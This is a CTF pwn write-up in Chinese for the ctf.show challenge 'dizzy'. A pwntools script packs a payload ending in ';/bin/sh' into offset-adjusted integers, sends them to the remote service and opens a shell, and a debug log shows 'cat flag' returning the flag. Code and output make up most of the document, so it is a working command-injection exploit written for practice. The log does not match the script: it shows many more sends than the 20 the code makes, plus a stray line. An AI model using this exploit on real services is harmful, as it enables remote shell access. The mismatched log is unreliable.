ida:
这题考察的是 shell 命令用 `;` 分隔后，即使前半段是错误的命令，后面的部分仍然可以执行
还有字符串是用\x00截断的
但主要的是要看懂程序的检查机制
exp:
import struct

from pwn import *
# Verbose tube logging: every line sent/received is echoed, which is where
# the [DEBUG] transcript below comes from.
context(log_level="debug")

# Connection to the remote challenge instance.
io = remote("pwn.challenge.ctf.show", 28164)

# Local copy of the challenge binary.  It is loaded here but not referenced
# again anywhere in this script.
elf = ELF("./dizzy")
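# Payload string.  The leading phrase is what the program's check expects; the
# ';' ends that shell command, so "/bin/sh" runs as a second command even
# though the first one fails ("sh: 1: PvvN: not found" in the log below).
# It is right-padded with NUL to 80 bytes = 20 dwords, and the NUL is also what
# terminates the string on the C side (see the notes above).
s = "PvvN| 1S S0 GREAT!;/bin/sh".ljust(80, "\x00")

# Pack every 4 characters into one little-endian unsigned 32-bit integer
# (byte i+3 is the most significant).  All characters are ASCII/NUL, so the
# latin-1 encoding is a 1:1 byte mapping.
payload = s.encode("latin-1")
arr = list(struct.unpack("<%dI" % (len(payload) // 4), payload))

# The remote presumably adds 0x1BF52 (decimal 114514) back to each value before
# using it, so it is subtracted here; the all-NUL padding dwords become
# -114514, which is what the debug log below shows.
# NOTE(review): the 0x1BF52 offset is taken from this exploit as written, not
# re-verified against the disassembly.
arr = [value - 0x1BF52 for value in arr]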
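# Send the 20 adjusted dwords as decimal text, one per line, in order
# (one "Sent" entry per value in the debug log below).
for value in arr[:20]:
    io.sendline(str(value))

# Hand the tube over to the user; by now the second shell command ("/bin/sh")
# should be running on the remote side.
io.interactive()
# A duplicated `io.sendline(str(arr[i]))` that followed interactive() was
# removed: it could only run after the session ended and would fail on the
# closed tube.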
[DEBUG] Sent 0xb bytes:
b'1316271870\n'
[DEBUG] Sent 0xb bytes:
b'1395613994\n'
[DEBUG] Sent 0xa bytes:
b'539923406\n'
[DEBUG] Sent 0xb bytes:
b'1094947573\n'
[DEBUG] Sent 0xa bytes:
b'792289794\n'
[DEBUG] Sent 0xa bytes:
b'795650576\n'
[DEBUG] Sent 0x7 bytes:
b'-87775\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[DEBUG] Sent 0x8 bytes:
b'-114514\n'
[*] Switching to interactive mode
[DEBUG] Received 0x2c bytes:
b'sh: 1: PvvN: not found\n'
b'sh: 1: 1S: not found\n'
sh: 1: PvvN: not found
sh: 1: 1S: not found
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x2e bytes:
b'ctfshow{f56693d7-0a3d-4f15-b6a8-14864a26ce5a}\n'
ctfshow{f56693d7-0a3d-4f15-b6a8-14864a26ce5a}
$